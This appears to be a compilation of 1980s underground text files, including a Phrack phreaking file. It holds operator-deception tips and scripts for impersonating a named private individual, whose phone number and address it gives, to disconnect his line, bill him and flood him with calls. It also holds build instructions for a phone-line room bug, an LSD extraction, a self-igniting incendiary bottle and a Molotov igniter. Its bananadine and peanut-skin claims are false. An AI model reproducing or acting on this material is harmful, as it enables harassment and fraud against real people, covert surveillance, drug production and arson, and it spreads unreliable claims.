what to do? Well if the operator hears you use a little Bell jargon, she might
wise up. Here is a little diagram (excuse the artwork) of the structure of
operators

/--------\     /------\     /-----\
!Operator!-- > ! S.A. ! --->! BOS !
\--------/     \------/     \-----/
   !
   !
   V
/-------------\
! Group Chief !
\-------------/

    Now most of the operators are not bugged, so they can curse at you, if they
do ask INSTANTLY for the "S.A." or the Service Assistant. The operator does not
report to her (95% of them are hers) but they will solve most of your problems.
She MUST give you her name as she connects & all of these calls are bugged. If
the SA gives you a rough time get her BOS (Business Office Supervisor) on the
line. S/He will almost always back her girls up, but sometimes the SA will get
tarred and feathered. The operator reports to the Group Chief, and S/He will
solve 100% of your problems, but the chances of getting S/He on the line are
nill.
    If a lineman (the guy who works out on the poles) or an installation man
gives you the works ask to speak to the Installation Foreman, that works
wonders.
    Here is some other bell jargon, that might come in handy if you are having
trouble with the line. Or they can be used to lie your way out of
situations....

     An Erling is a line busy for 1 hour, used mostly in traffic studies A
Permanent Signal is that terrible howling you get if you disconnect, but don't
hang up.
     Everyone knows what a busy signal is, but some idiots think that is the
*Actual* ringing of the phone, when it just is a tone "beeps" when the phone is
ringing, wouldn't bet on this though, it can (and does) get out of sync.
     When you get a busy signal that is 2 times as fast as the normal one, the
person you are trying to reach isn't really on the phone, (he might be), it is
actually the signal that a trunk line somewhere is busy and they haven't or
can't reroute your call. Sometimes you will get a Recording, or if you get
nothing at all (Left High & Dry in fone terms) all the recordings are being
used and the system is really overused, will probably go down in a little
while. This happened when Kennedy was shot, the system just couldn't handle the
calls. By the way this is called the "reorder signal" and the trunk line is
"blocked".
     One more thing, if an overseas call isn't completed and doesn't generate
any money for AT&T, is is called an "Air & Water Call".

AT&T is no longer as stupid as she once was.  I advise STRONG caution when
phucking with Ma Bell.  -= Exodus =-


                                ==Phrack Inc.==

                     Volume One, Issue One, Phile #4 of 8

                        THE PHONE PHREAK'S FRY-UM GUIDE

                         COMPILED BY THE IRON SOLDIER

                            WITH HELP FROM DR. DOVE


NOTE: THIS GUIDE IS STILL BEING COMPILED, AND AS PHONE PHREAKS LEARN MORE IN
THE ART OF VENGEANCE IT WILL ALWAYS EXPAND.


"Vengeance is mine", says the Phreak.


METHOD 1-PHONE LINE PHUN

Call up the business office.  It should be listed at the front of the white
pages.  Say you wanted to disconnect Scott Korman's line. DIAL 800-xxx-xxxx.
      "Hello, this is Mr. Korman, I'm moving to California and would like to
have my phone service disconnected. I'm at the airport now.  I'm calling from
a payphone, my number is  [414] 445 5005. You can send my final bill to:
(somewhere in California). Thank you."


METHOD 2-PHONE BOOKS

Call up the business office from a pay phone.  Say :
     "Hello, I'd like to order a Phone Book for Upper Volta (or any out-of-the
way area with Direct Dialing).  This is Scott Korman, ship to 3119 N. 44th St.
Milwaukee, WI 53216.  Yes, I under stand it will cost $xx($25-$75!!). Thank
you."


METHOD 3-PHONE CALLS

Call up a PBX, enter the code and get an outside line.  Then dial 0+ the number
desired to call.  You will hear a bonk and then an operator.  Say, "I'd like to
charge this to my home phone at 414-445-5005. Thank you."  A friend and I did
this to a loser, I called him at 1:00 AM and we left the fone off the hook all
night.  I calculated that it cost him $168.


METHOD 4-MISC SERVICES

Call up the business office once again from a payfone.  Say you'd like call
waiting, forwarding, 3 way, etc.  Once again you are the famed loser Scott
Korman.  He pays-you laugh.  You don't know how funny it was talking to him,
and wondering what those clicks he kept hearing were.


METHOD 5-CHANGED & UNPUB

Do the same as in #4, but say you'd like to change and unlist your (Scott's)
number.  Anyone calling him will get:

    "BEW BEW BEEP.  The number you have reached, 445-5005, has been changed to
a non-published number.  No further....."


METHOD 6-FORWRDING

    This required an accomplice or two or three.  Around Christmas time, go to
Toys 'R' Us.  Get everyone at the customer service or manager's desk away
("Hey, could you help me").  then you get on their phone and dial (usually dial
9 first) and the business office again. This time, say you are from Toys 'R'
Us, and you'd like to add call forwarding to 445-5005.  Scott will get 100-600
calls a day!!!


METHOD 7-RUSSIAN CALLER

    Call a payphone at 10:00 PM.  Say to the operator that you'd like to book a
call to Russia.  Say you are calling from a payphone, and your number is that
of the loser to fry (e.g. 445-5005). She will say that she'll have to call ya
back in 5 hours, and you ok that. Meanwhile the loser (e.g.) Scott, will get a
call at 3:00 AM from an operator saying that the call he booked to Russia is
ready.


IF YOU HAVE ANY QUESTIONS LEAVE E-MAIL FOR ME ON ANY BOARD I'M ON.
The Iron Soldier
TSF-The Second Foundation!




-= Exodus =-
   HOTWU!
International Country Code Listing            courtesy of Exodus
                                              Orig. by JR  


*UNITED KINGDOM/IRELAND
------------------------------------
IRELAND.........................353
UNITED KINGDOM...................44

*EUROPE
------------------------------------
ANDORRA..........................33
AUSTRIA..........................43
BELGIUM..........................32
CYPRUS..........................357
CZECHOLSLOVAKIA..................42
DENMARK..........................45
FINLAND.........................358
FRANCE...........................33
GERMAN DEMOCRATIC REPUBLIC.......37
GERMANY, FEDERAL REPUBLIC OF.....49
GIBRALTAR.......................350
GREECE...........................30
HUNGARY..........................36
ICELAND.........................354
ITALY............................39
LIECHTENSTEIN....................41
LUXEMBOURG......................352
MONACO...........................33
NETHERLANDS......................31
NORWAY...........................47
POLAND...........................48
PORTUGAL........................351
ROMANIA..........................40
SAN MARINO.......................39
SPAIN............................34
SWEDEN...........................46
SWITZERLAND......................41
TURKEY...........................90
VATICAN CITY.....................39
YUGOSLAVIA.......................38

*CENTRAL AMERICA
------------------------------------
BELIZE..........................501
COSTA RICA......................506
EL SALVADOR.....................503
GUATEMALA.......................502
HONDURAS........................504
NICARAGUA.......................505
PANAMA..........................507

*AFRICA
------------------------------------
ALGERIA.........................213
CAMEROON........................237
EGYPT............................20
ETHIOPIA........................251
GABON...........................241
IVORY COAST.....................225
KENYA...........................254
LESOTHO.........................266
LIBERIA.........................231
LIBYA...........................218
MALAWI..........................265
MOROCCO.........................212
NAMIBIA.........................264
NIGERIA.........................234
SENEGAL.........................221
SOUTH AFRICA.....................27
SWAZILAND.......................268
TANZANIA........................255
TUNISIA.........................216
UGANDA..........................256
ZAMBIA..........................260
ZIMBABWE........................263

*PACIFIC
------------------------------------
AMERICAN SAMOA..................684
AUSTRAILIA.......................61
BRUNEI..........................673
FIJI............................679
FRENCH POLYNESIA................689
GUAM............................671
HONG KONG.......................852
INDONESIA........................62
JAPAN............................81
KOREA, REPUBLIC OF...............82
MALAYSIA.........................60
NEW CALEDONIA...................687
NEW ZEALAND......................64
PAPUA NEW GUINEA................675
PHILIPPINES......................63
SAIPAN..........................670
SINGAPORE........................65
TAIWAN..........................886
THAILAND.........................66

*INDIAN OCEAN
------------------------------------
PAKISTAN.........................92
SRI LANKA........................94

*SOUTH AMERICA
------------------------------------
ARGENTINA........................54
BOLIVIA.........................591
BRAZIL...........................55
CHILE............................56
COLOMBIA.........................57
ECUADOR.........................593
GUYANA..........................592
PARAGUAY........................595
PERU.............................51
SURINAME........................597
URUGUAY.........................598
VENEZUELA........................58

*NEAR EAST
------------------------------------
BAHRAIN.........................973
IRAN.............................98
IRAQ............................964
ISRAEL..........................972
JORDAN..........................962
KUWAIT..........................965
OMAN............................968
QATAR...........................974
SAUDI ARABIA....................966
UNITED ARAB EMIRATES............971
YEMEN ARAB REPUBLIC.............967

*CARIBBEAN/ATLANTIC
------------------------------------
FRENCH ANTILLES.................596
GUANTANAMO BAY (US NAVY BASE)....53
HAITI...........................509
NETHERLANDS ANTILLES............599
ST. PIERRE AND MIQUELON.........508

*INDIA
------------------------------------
INDIA............................91

*CANADA
------------------------------------
TO CALL CANADA, DIAL 1 + AREA CODE +
LOCAL NUMBER.

*MEXICO
------------------------------------
TO CALL MEXICO, DIAL 011 + 52 + CITY CODE+ LOCAL NUMBER.


To dial international calls:

International Access Code + Country code + Routing code

Example :

To call Frankfurt, Germany, you would do the following:

011 + 49 + 611 + (# wanted) + # sign(octothrope)

The # sign at the end is to tell Bell that you are done entering in all the
needed info.



The Infinity Transmitter                  courtesy of Exodus
                                          originally typed by:
                                                    <<<Ghost Wind>>>

                         FROM THE BOOK BUILD YOUR OWN
         LASER, PHASER, ION RAY GUN & OTHER WORKING SPACE-AGE PROJECTS
                       BY ROBERT IANNINI (TAB BOOKS INC)

Description:  Briefly, the Infinity Transmitter is a device which activates a
microphone via a phone call.  It is plugged into the phone line, and when the
phone rings, it  will immediately intercept the ring and broadcast into the
phone any sound that is in the room. This device was originally made by
Information Unlimited, and had a touch tone decoder to prevent all who did not
know the code from being able to use the phone in its normal way.  This
version, however, will activate the microphone for anyone who calls while it is
in operation.
NOTE:  It is illegal to use this device to try to bug someone. It is also
pretty stupid because they are fairly noticeable.
Parts List:
Pretend that uF means micro Farad, cap= capacitor

Part           #          Description
----           -          -----------
R1,4,8         3         390 k 1/4 watt resistor
R2             1         5.6 M 1/4 watt resistor
R3,5,6         3         6.8 k 1/4 watt resistor
R7/S1          1         5 k pot/switch
R9,16          2         100 k 1/4 watt resistor
R10            1         2.2 k 1/4 watt resistor
R13,18         2         1 k 1/4 watt resistor
R14            1         470 ohm 1/4 watt resistor
R15            1         10 k 1/4 watt resistor
R17            1         1 M 1/4 watt resistor
C1             1         .05 uF/25 V disc cap
C2,3,5,6,7     5         1 uF 50 V electrolytic cap or tant
                          (preferably non-polarized)
C4,11,12       3         .01 uF/50 V disc cap
C8,10          2         100 uF @ 25 V electrolytic cap
C9             1         5 uF @ 150 V electrolytic cap
C13            1         10 uF @ 25 V electrolytic cap
TM1            1         555 timer dip
A1             1         CA3018 amp array in can
Q1,2           2         PN2222 npn sil transistor
Q3             1         D4OD5 npn pwr tab transistor
D1,2           2         50 V 1 amp react. 1N4002
T1             1         1.5 k/500 matching transformer
M1             1         large crystal microphone
J1             1         Phono jack optional for sense output
WR3            (24")     #24 red and black hook up wire
WR4            (24")     #24 black hook up wire
CL3,4          2         Alligator clips
CL1,2          2         6" battery snap clips
PB1            1         1 3/4x4 1/2x.1 perfboard
CA1            1         5 1/4x3x2 1/8 grey enclosure fab
WR15           (12")     #24 buss wire
KN1            1         small plastic knob
BU1            1         small clamp bushing
B1,2           2         9 volt transistor battery or 9V ni-cad

Circuit Operation: Not being the most technical guy in the world, and not being
very good at electronics (yet),  I'm just repeating what Mr. Iannini's said
about the circuit operation.  The Transmitter consists of a high grain
amplifier fed into the telephone lines via transformer.  The circuit is
initiated by the action  of  a voltage transient pulse occurring across  the
phone line  at the instant the telephone circuit is made (the ring,  in other
words).  This transient immediately triggers a timer  whose output  pin  3 goes
positive, turning on transistors Q2 and  Q3. Timer TM1 now remains in this
state for a period depending on the values  of R17 and C13 (usually about 10
seconds for  the  values shown). When Q3 is turned on by the timer, a simulated
"off hook" condition is created by the switching action of Q3 connecting the
500  ohm  winding  of the transformer directly across  the  phone lines.
Simultaneously, Q2 clamps the ground of A1, amplifier, and Q1, output
transistor, to the negative return of B1,B2, therefore enabling this amplifier
section.  Note that B2 is always required by  supplying  quiescent power to TM1
during  normal conditions. System is off/on controlled by S1 (switch).
  A  crystal mike picks up the sounds that are fed to  the  first two
transistors of the A1 array connected as an emitter follower driving the
remaining  two  transistors  as  cascaded   common emitters. Output of the
array now drives Q1 capacitively coupled to  the  1500 ohm  winding of  T1.
R7  controls  the  pick  up sensitivity of the system.
  Diode  D1  is  forward biased at the instant of  connection  and essentially
applies a negative pulse at pin 2 of TM1,  initiating the cycle.   D2 clamps
any high positive pulses.   C9 dc-isolates and desensitizes the circuit. The
system described should operate when any incoming call is made without ringing
the phone.

Schematic Diagram:  Because this is text,  this doesn't look  too hot. Please
use  a little imagination!  I will hopefully get  a graphics drawing  of  this
out as soon as I  can  on  a  Fontrix graffile.

To be able to see what everything is, this character: | should appear as a
horizontal bar. I did this on a ][e using a ][e 80 column card, so I'm sorry if
it looks kinda weird to you.

Symbols:
 resistor: -/\/\/-            switch: _/ _
 battery:  -|!|!-             capacitor (electrolytic): -|(-
 capacitor (disc): -||-                   _    _
 transistor:(c)  > (e)        Transformer: )||(
              \_/                          )||(
               |(b)                       _)||(_
 diode: |<
 chip: ._____.
       !_____! (chips are easy to recognize!)

 Dots imply a connection between wires. NO DOT, NO CONNECTION.
ie.:  _!_ means a connection while _|_ means no connection.
----------------------------------------------------------------------------

.________________________to GREEN wire phone line
|
| .______________________to RED wire phone line
| |
| |     ._________(M1)______________.
| |     |                           |
| |     |           R1              |
| |     !__________/\/\/____________!
| |     |                          _!_ C1
| |     |this wire is the amp      ___
| |     |<=ground                   |                     R2
| |     |                           !___________________/\/\/_____________.
| |     |                   ._______!_______.                             |
| |     !___________________!4      9     11!_____________________________!
| |     |                   |               |                             |
| |     !___________________!7            12._____________________________!
| |     |                   |     A1        |              R3             |
| |     !___________________!10       ____*8!_______.____/\/\/____________! ^
| |     |                   |        /      |       |                     | |
| |     |    C4             |       /       |       \                     |2ma
| |     !____||______.      |      /        |       /R4                B1 +
| |     |    ||      |      |     /         |       \                    |!|!
| |     |     R7     |  C2  |    /          |       /                     |
| |     !____/\/\/___!__)|__!8*_/           |       |                 S1  |
| |     |     ^             |              6!_______!           neg<__/.__!
| |     |     |     C3      |               |       | C5       return     |
| |     |     !_____|(___.__!3              |       '-|(-|                |
| |     |                |  |       5      1!____________!                |
| |     |                \  !_______._______!            |             B2|!|!
| |     !________.    R8 /          |                    |                +
| |              |       \          |                    |      R6        |3ma
| |              |       !__________!____________________|_____/\/\/______! |
| |              |    R5            |                    |                | v
| |              !__/\/\/___________|____________________!                |
| |              |                  |                                     |
| |              |                  |                                     |
| |              |               C6 |                                     |
| |              |             |-)|-'             R9                      |
| |              |             !_________________/\/\/_______.            |
| |              |             |                             |            |
| |              |         Q1 _!_                            |   R10      |
| |              !____________/ \____________________________!__/\/\/_____!
| |              |                                           |            |
| |              |                                           |            |
| |              |          C8                               |            |
| |              !__________)|_______________________________|____________!
| |              !                                           |            |
| |             /                                            |            |
| |       -----|                                             |            |
| |       |     \                                            |            |
| |       |      >                                           |            |
| |       |      |                                           |            |
| |       |      |                                           |            |
| |       |      !_____________.                             |            |
| |       |                    |                             |            |
| |       !__________.         |                             |            |
| |                  |         |                             |            |
| !________.         |         |                       ._____!            |
|          |         |         |                       |                  |
|          |         |         |                       |                  |
|          |         |         |                       | C7               |
|          |         |         |                       '-|(-|             |
|          |_________|_________!_______.T1._________________|             |
|                    |         |  1500 )||( 500                           |
|                    |         |   ohm )||( ohm                           |
|                    |         !______.)||(.__.                           |
|                    |         |              |                           |
|                    |         |              |                           |
|                    |         |              >                           |
|                    |         |            |/                            |
|                    |         |       +----|   Q3                        |
|                    |         |       |    |\                            |
!____________________|_________|_______|______!__. D1   C9                |
                     |         |       |         '-|<---|(------|         |
      .______________!         |       |                        |         |
      |                        |       |                        |         |
      |       .________________!       |                        |         |
      |       |                        |                        |         |
      \       |       .________________!             C11        |         |
      /       |       |                       .___||____________!         |
  R13 \       |       |                       |   ||            |         |
      /       |       |                       |                 |         |
      \       !___.___|_______________________!                 |         |
      |       |   |   |                       |     R16         |    R15  |
      |       v   |   |                       !___/\/\/\________!___/\/\/_!
      |      neg  |   |                       |    D2           |         |
      |    return |   |                       !_____|<__________!         |
      |     B1,B2 |   \                       |                 |         |
      |           |   /                       |    .____________!_.       |
      |           |   \R14                    |C12 |   TM1      2 |       |
      |           |   /                       !_||_!5            4!_______!
      |           |   \                       | || |              |       |
      |           |   |                       !____!1            8!_______!
      |           |   |                       |    |     7 6   3  |       |
      |           |   |                       |    !_____._.____._!       |
      |           |   |                       |          | |    |         |
      |           |   |                       |   C13    | |    |   R17   |
      |           |   |                       !___)|_____!_!____|__/\/\/__!
      |           |   |                       |                 |         |
      !___________|___!_______________________|_________________!         |
                  |   |                       |                           |
                  |   \                       |          C10              |
                  |   /R18                    !__________)|_______________!
                  |   \
                  |   /
                  |   |
                  !___O J1
                    sense output

Construction notes: Because the damned book just gave a picture instead of step
by step instructions, and I'll try to give you as much help as possible. Note
that all the parts that you will be using are clearly labeled in the schematic.
The perfboard, knobs, 'gator clips, etc are optional. I do strongly suggest
that you do use the board!!! It will make wiring the components up much much
easier than if you don't use it.
 The knob you can use to control the pot (R7). R7 is used to tune the IT so
that is sounds ok over the phone. (You get to determine what sounds good) By
changing the value of C13, you can change the amount of time that the circuit
will stay open (it cannot detect a hang up, so it works on a timer.) A value of
100 micro Farads will increase the time by about 10 times.
 The switch (S1) determines whether or not the unit is operational. Closed is
on. Open is off. The negative return is the negative terminals of the battery!!
The batteries will look something like this when hooked up:

  <-v_____.   .______.    ._____.   .____->
          |   |      |    |     |   |
        __!___!__    |    |   __!___!__
        | +   - |    !_/ _!   | +   - |
        |       |  switch ^   |       |
        | 9volts|         |   | 9volts|
        !_______! neg return  !_______!

 To hook this up to the phone line, there are three ways, depending upon what
type of jack you have. If it is the old type (non modular) then you can just
open up the wall plate and connect the wires from the transmitter directly to
the terminals of the phone.
 If you have a modular jack with four prongs, attach the red to the negative
prong (don't ask me which is which! I don't have that type of jack... I've only
seen them in stores), and the green to the positive prong, and plug in. Try not
to shock yourself...
 If you have the clip-in type jack, get double male extension cord (one with a
clip on each end), and chop off one clip. Get a sharp knife and splice off the
grey protective material. You should see four wires, including one green and
one red. You attach the appropriate wires from the IT to these two, and plug
the other end into the wall.

Getting the IT to work: If you happen to have a problem, you should attempt to
do the following (these are common sense rules!!) Make sure that you have the
polarity of all the capacitors right (if you used polarized capacitors, that
is). Make sure that all the soldering is done well and has not short circuited
something accidently (like if you have a glob touching two wires which should
not be touching.) Check for other short circuits. Check to see if the battery
is in right. Check to make sure the switch is closed.
 If it still doesn't work, drop me a line on one of the Maryland or Virginia
BBSs and I'll try to help you out.

The sense output: Somehow or other, it is possible to hook something else up to
this and activate it by phone (like an alarm, flashing lights, etc.)

As of this writing, I have not tried to make one of these, but I will. If you
actually get it working, leave me a note somewhere.

I sure hope all you people appreciate this.


      LSD                                    courtesy of Exodus

          I  think,  of  all the drugs on the black market today, LSD is
          the strangest. It is the most recent major  drug  to  come  to
          life  in  the psychedelic subculture. (Blah blah blah... let's
          get to the good stuff: How to make it in your kitchen!!)

       1) Grind up 150 grams of Morning Glory seeds or baby  Hawaiian
          wood rose seeds.
       2) In 130 cc. of petroleum ether, soak the seeds for two days.
       3) Filter the solution through a tight screen.
       4) Throw away the liquid, and allow the seed mush to dry.
       5)  For  two  days  allow  the mush to soak in 110 cc. of wood
          alcohol.
       6) Filter the solution again, saving the liquid  and  labeling
          it "1."
       7)  Resoak  the  mush  in 110 cc.  of  wood  alcohol  for  two
          days.
       8) Filter and throw away the mush.
       9) Add the liquid from the second soak to the solution labeled
          "1."
      10)  Pour  the  liquid  into  a  cookie  tray  and allow it to
          evaporate.
      11) When all of  the  liquid  has  evaporated,  a  yellow  gum
          remains. This should be scraped up and put into capsules.

               30 grams of Morning Glory seeds = 1 trip
               15 Hawaiian wood rose seeds = 1 trip

          Many  companies,  such as Northop-King have been coating their
          seeds with a toxic chemical, which is poison. Order seeds from
          a wholesaler, as it is much safer and cheaper.  Hawaiian  wood
          rose seeds can be ordered directly from:

               Chong's Nursery and Flowers
               P.O. Box 2154
               Honolulu, Hawaii


  LSD DOSAGES
  -----------

          The  basic dosages of acid vary according to what kind of acid
          is available and what medium of ingestion is used. Chemically,
          the potency of LSD-25 is measured in micrograms, or  mics.  If
          you're  chemically  minded  or  making  your  own  acid,  then
          computing the number of micrograms is very important.  Usually
          between  500  and  800  mics  is  plenty  for  an 8 hour trip,
          depending on the quality of the acid, of course. I have  heard
          of people taking as much as 1,500-2,000 mics. This is not only
          extremely dangerous, it is extremely wasteful.

          LSD  comes  packaged  in many different forms. The most common
          are listed below:
 
          1) The brown spot, or a piece of paper with a dried  drop
               of  LSD  on it, is always around. Usually one spot equals
               one trip.
          2) Capsuled acid is very tricky, as the cap can be almost
               any color, size, or potency. Always ask what the acid  is
               cut  with,  as  a lot of acid is cut with either speed or
               strychnine. Also note dosage.
          3) Small white or colored  tablets  have  been  known  to
               contain acid, but, as with capsuled acid, it's impossible
               to tell potency, without asking.


          (from the Anarchist's Cookbook IV. Re-typed up by Exodus)




      Bananas                                courtesy of Exodus

          Believe  it  or  not,  bananas  do contain a small quantity of
          _Musa Sapientum bananadine_, which is  a  mild,  short-lasting
          psychedelic.  There  are much easier ways of getting high, but
          the great advantage to this method is that bananas are legal.

          1) Obtain 15 lbs. of ripe yellow bananas.
          2) Peel all 15 lbs. and eat the fruit. Save the peels.
          3) With a sharp knife, scrape off the insides of the peels and
          save the scraped material.
          4) Put all of the scraped material in  a  large  pot  and  add
          water.  Boil  for  three to four hours until it has attained a
          solid paste consistency.
          5) Spread this paste on cookie sheets, and dry in an over  for
          about  20  minutes  to a half hour. This will result in a fine
          black powder. Makes about  one  pound  of  bananadine  powder.
          Ususally one will feel the effects of bananadine after smoking
          three or four cigarettes.

                              Table of Weights

               Pounds         Ounces         Grams          Kilos
               1              16             453.6          0.4536
               0.0625         1              28.35          0.0283
                              0.0352         1              0.001
               2.205          35.27          1,000          1


          (from the Anarchist's Cookbook IV. Re-typed by Exodus)


      Yummy Marihuana Recipes                courtesy of Exodus

          Acapulco Green
          --------------

      3 ripe avocados
      1/2 cup chopped onions
      2 teaspoons chili powder
      3 tablespoons wine vinegar
      1/2 cup chopped marahuana (grass)

      Mix  the  vinegar,  grass,  and  chili powder together and let the
      mixture stand for one hour. Then add avocados and onions and  mash
      it all together. It can be served with tacos or as a dip.

          Pot Soup
          --------

      1 can condensed beef broth
      3 tablespoons grass
      3 tablespoons lemon juice
      1/2 can water
      3 tablespoons chopped watercress

      Combine  all  ingredients  in  a saucepan and bring to a boil over
      medium heat. Place in a  refrigerator  for  two  to  three  hours,
      reheat, and serve.

          Pork and Beans and Pot
          ----------------------

      1 large can (1 lb. 13 oz.) pork and beans
      1/2 cup grass
      4 slices bacon
      1/2 cup light molasses
      1/2 teaspoon hickory salt
      3 pineapple rings

      Mix  together  in a casserole, cover top with pineapple and bacon,
      bake at 350 degrees for about 45 minutes. Serves about six.

          The Meat Ball
          -------------

      1 lb. hamburger
      1/4 cup chopped onions
      1 can cream of mushroom soup
      1/4 cup bread crumbs
      3 tablespoons grass
      3 tablespoons India relish

      Mix it all up and shape into meat balls. Brown in frying  pan  and
      drain. Place in a casserole with soup and 1/2 cup water, cover and
      cook over low heat for about 30 minutes. Feeds about four people.

          Spaghetti Sauce
          ---------------

      1 can (6 oz.) tomato paste
      2 tablespoons olive oil
      1/2 cup chopped onions
      1/2 cup chopped grass
      1 pinch pepper
      1 can (6 oz.) water
      1/2 clove minced garlic
      1 bay leaf
      1 pinch thyme
      1/2 teaspoon salt

      Mix  in large pot, cover and simmer with frequent stirring for two
      hours. Serve over spaghetti.

          Pot Loaf
          --------

      1 packet onion soup mix
      1 (16 oz.) can whole peeled tomatoes
      1/2 cup chopped grass
      2 lbs. ground beef or chicken or turkey
      1 egg
      4 slices bread, crumbled

      Mix all ingredients and shape into a loaf. Bake for  one  hour  in
      400-degree oven. Serves about six.

          Chili Bean Pot
          --------------

      2 lbs. pinto beans
      1 lb. bacon, cut into two-inch sections
      2 cups red wine
      4 tablespoons chili powder
      1/2 clove garlic
      1 cup chopped grass
      1/2 cup mushrooms

      Soak  beans  overnight in water. In a lagre pot pour boiling water
      over beans and simmer for at least an hour, adding more  water  to
      keep  beans covered. Now add all other ingredients and continue to
      simmer for another three hours. Salt to taste. Serves about ten.

          Bird Stuffing
          -------------

      5 cups rye bread crumbs
      2 tablespoons poultry seasoning
      1/2 cup each of raisins and almonds
      1/2 cup celery
      1/3 cup chopped onions
      3 tablespoons melted butter
      1/2 cup chopped grass
      2 tablespoons red wine

      Mix it all together, and then stuff it in.

          Apple Pot
          ---------

      4 apples (cored)
      1/2 cup brown sugar
      1/4 cup water
      4 cherries
      1/3 cup chopped grass
      2 tablespoons cinnamon

      Powder the grass in a blender, then mix grass with sugar and water.
      Stuff cores with this paste. Sprinkle apples  with  cinnamon,  and
      top with a cherry. Bake for 25 minutes at 350 degrees.

          Pot Brownies
          ------------

      1/2 cup flour
      3 tablespoons shortening
      2 tablespoons honey
      1 egg (beaten)
      1 tablespoon water
      1/2 cup grass
      pinch of salt
      1/4 teaspoon baking powder
      1/2 cup sugar
      2 tablespoons corn syrup
      1 square melted chocolate
      1 teaspoon vanilla
      1/2 cup chopped nuts

      Sift  flour,  baking  powder,  and  salt together. Mix shortening,
      sugar, honey, syrup, and egg. Then blend in  chocolate  and  other
      ingredients, and mix well. Spread in an 8-inch pan and bake for 20
      minutes ate 350 degrees.

          Banana Bread
          ------------

      1/2 cup shortening
      2 eggs
      1 teaspoon lemon juice
      3 teaspoons baking powder
      1 cup sugar
      1 cup mashed bananas
      2 cups sifted flour
      1/2 cup chopped grass
      1/2 teaspoon salt
      1 cup chopped nuts

      Mix the shortening and sugar, beat eggs, and add to mixture.
      Seperately  mix  bananas  with  lemon  juice  and  add to the first
      mixture. Sift flour, salt, and baking powder  together,  then  mix
      all ingredients together. Bake for 1 1/4 hours at 375 degrees.

          Sesame Seed Cookies
          -------------------

      3 oz. ground roast sesame seeds
      3 tablespoons ground almonds
      1/4 teaspoon nutmeg
      1/4 cup honey
      1/2 teaspoon ground ginger
      1/4 teaspoon cinnamon
      1/4 oz. grass

      Toast  the  grass  until  slightly  brown  and  then crush it in a
      mortar. Mix  crushed  grass  with  all  other  ingredients,  in  a
      skillet. Place skillet over low flame and add 1 tablespoon of salt
      butter.  Allow  it  to  cook.  When cool, roll mixture into little
      balls and dip them into the sesame seeds.

      If you happen to be in the country at a place where pot  is  being
      grown,  here's  one  of  the  greatest recipes you can try. Pick a
      medium-sized leaf off of the marihuana plant and dip it into a cup
      of drawn butter, add salt, and eat.

                           -----------Exodus---------
                        (from the Anarchist's Cookbook IV!)




      Peanuts                     Orig. by the Jolly Roger


      Try this sometime when you are bored!

      1) Take one pound of raw peanuts (not roasted!)

      2) Shell them, saving the skins and discarding the shells.

      3) Eat the nuts.

      4) Grind up the skins and roll them into a cigarette, and smoke!

      You'll have fun, believe me! -------------Exodus-----------


      Chemical Fire Bottle                   Orig. by the Jolly Roger

      This incendiary bottle is self-igniting on target impact.

      Materials Required
      ------------------
                               How Used               Common Source

      Sulphuric Acid           Storage Batteries      Motor Vehicles
                               Material Processing    Industrial Plants

      Gasoline                 Motor Fuel             Gas Station or
                                                      Motor Vehicles

      Potassium Chlorate       Medicine               Drug Stores

      Sugar                    Sweetening Foods       Food Store

      Glass bottle with stopper (roughly 1 quart size)
      Small Bottle or jar with lid.
      Rag or absorbant paper (paper towels, newspaper)
      String or rubber bands

      Procedure:
      ---------

      1)  Sulphuric  Acid MUST be concentrated. If battery acid or other
      dilute acid is used, concentrate it by boiling until  dense  white
      fumes  are  given  off.  Container  used  to  boil  should  be  of
      enamel-ware or oven glass.

      CAUTION: Sulphuric Acid will burn skin and  destroy  clothing.  If
      any is spilled, wash it away with a large quantity of water. Fumes
      are also VERY dangerous and should not be inhaled.

      2)   Remove  the  acid  from  heat  and  allow  to  cool  to  room
      temperature.

      3) Pour gasoline into the large  (1  quart)  bottle  until  it  is
      approximately 1/3 full.

      4)  Add  concentrated  sulphuric acid to gasoline slowly until the
      bottle is filled to within 1" to 2" from top. Place the stopper on
      the bottle.

      5) Wash the outside of the bottle thoroughly with clear water.

      CAUTION: If this is not done, the fire bottle may be dangerous  to
      handle during use!

      6)  Wrap a clean cloth or several sheets of absorbant paper around
      the outside of the bottle. Tie with string or fasten  with  rubber
      bands.

      7)  Dissolve 1/2 cup (100 grams) of potassium chlorate and 1/2 cup
      (100 grams) of sugar in one cup (250 cc) of boiling water.

      8) Allow the solution to cool, pour into the small bottle and  cap
      tightly.  The  cooled  solution should be approx. 2/3 crystals and
      1/3 liquid. If there is more than this,  pour  off  excess  before
      using.

      CAUTION: Store this bottle seperately from the  other bottle!

      How To Use:
      ----------

      1)  Shake the small bottle to mix contents and pour onto the cloth
      or paper around the large bottle. Bottle can be used wet or  after
      solution is dried. However, when dry, the sugar-Potassium chlorate
      mixture  is very sensitive to spark or flame and should be handled
      accordingly.

      2) Throw or launch the bottle. When the bottle  breaks  against  a
      hard surface (target) the fuel will ignite.

                         --------------Exodus---------------


      Igniter from Book Matches                     by the Jolly Roger

          This  is  a  hot  igniter made from paper book matches for use
      with molotov cocktail and other incendiaries.

      Material Required:
      -----------------

      Paper book matches
      Adhesive or friction tape

      Procedure:
      ---------

      1) Remove the staple(s) from match book and seperate matches  from
      cover.

      2) Fold and tape one row of matches (fold in thirds)

      3) Shape the cover into a tube with striking surface on the inside
      and  tape.  Make sure the folder cover will fit tightly around the
      taped match heads. Leave cover open at opposite end for  insertion
      of the matches.

      4)  Push the taped matches into the tube until the bottom ends are
      exposed about 3/4 in. (2 cm)

      5) Flatten and fold the open end of the tube so that it laps  over
      about 1 in. (2-1/2 cm); tape in place.

      Use with a Molotov Cocktail:
      ---------------------------

      1)  Tape  the  "match  end  tab" of the igniter to the neck of the
      molotov cocktail.

      2) Grasp the "cover and  tab"  and  pull  sharply  or  quickly  to
      ignite.

      General Use:
      -----------

      The  book  match igniter can be used by itself to ignite flammable
      liquids, fuse cords, and similar items requiring hot ignition.

      CAUTION: Store matches and  completed  igniters  in  moistureproof
      containers  such  as  rubber  or plastic bags until ready for use.
      Damp or wet paper book matches will not ignite.

                             Courtesy of -= Exodus =-      "Red or White Powder" Propellant            by the Jolly Roger

          "Red or White Powder" Propellant may be prepared in a  simple,
      safe  manner.  The  formulation  described  below  will  result in
      approximately 2 1/2  pounds  of  powder.  This  is  a  small  arms
      propellant  and  should  only  be  used  in  weapons  with 1/2 in.
      diameter or less (but not pistols!).

      Material Required:
      -----------------

      Heat Source (Kitchen Stove or open fire)
      2 gallon metal bucket
      Measuring cup (8 ounces)
      Wooden spoon or rubber spatula
      Metal sheet or aluminum foil (at least 18 in. sq.)
